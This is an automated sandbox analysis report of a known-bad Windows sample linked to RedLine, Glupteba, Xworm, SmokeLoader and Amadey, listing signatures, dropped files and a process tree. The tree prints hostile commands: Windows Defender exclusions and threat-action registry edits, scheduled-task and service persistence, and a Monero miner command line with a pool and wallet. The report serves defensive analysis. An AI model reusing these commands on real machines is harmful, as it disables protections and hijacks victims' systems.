Analysis Overview
SHA256
5a385c25beb70fc35b900bd712aeb9c5065004b5266ea6591c69c225e9bafae4
Threat Level: Known bad
The file 17ee93b40d1746f9d99cf8521a2ab566.bin was found to be: Known bad.
Malicious Activity Summary
RedLine
Glupteba payload
Detect Xworm Payload
Xworm
Glupteba
SmokeLoader
RedLine payload
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Stops running service(s)
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Themida packer
Checks BIOS information in registry
Identifies Wine through registry keys
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Program crash
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-14 01:02
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-14 01:02
Reported
2024-05-14 01:04
Platform
win7-20240221-en
Max time kernel
26s
Max time network
154s
Command Line
Signatures
Amadey
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Xworm
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameService.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | N/A |
| N/A | N/A | C:\Windows\Temp\127055.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Loads dropped DLL
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installm.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameService.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installg.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\installm.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
| File created | C:\Program Files (x86)\GameSyncLink\installc.bat | C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplons.job | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe
"C:\Users\Admin\AppData\Local\Temp\49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468.exe"
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 116
C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 52
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLink confirm
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 52
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
"C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
C:\Windows\Temp\127055.exe
"C:\Windows\Temp\127055.exe" --list-devices
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 52
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClientC
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClientC confirm
C:\Windows\SysWOW64\sc.exe
Sc delete PiercingNetLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove PiercingNetLink confirm
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start PiercingNetLink
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
"C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
C:\Windows\SysWOW64\sc.exe
Sc delete GameSyncLinks
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameSyncLinks confirm
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"
C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService start GameSyncLinks
C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-359867078-1201342197352886507-1521795268-1586590423-942573878-2093268082-1318655886"
C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
"C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe"
C:\Windows\Temp\728258.exe
"C:\Windows\Temp\728258.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe
"C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe"
C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe
"C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe"
C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe
"C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe"
C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe
"C:\Users\Admin\Pictures\S0HWF4lnwusjIQO1MqTseA0b.exe"
C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe
"C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe" /s
C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe
"C:\Users\Admin\Pictures\Mk1r2YAqwQVUv14MNBRTpeNB.exe"
C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe
"C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe"
C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000257001\FirstZ.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {3A9B6C6B-CA9B-4DC5-A930-AB37A5188810} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe
"C:\Users\Admin\Pictures\tX8T2gJKxzDcDwjjjrjNMPV9.exe"
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
C:\Users\Admin\AppData\Local\Temp\7zS20CA.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe
"C:\Users\Admin\Pictures\7WRtealACcE9KDLVlx7PIPxc.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe
"C:\Users\Admin\Pictures\yW21xyCVFtL5vbbMh8vSUV77.exe"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Users\Admin\AppData\Local\Temp\7zS3830.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
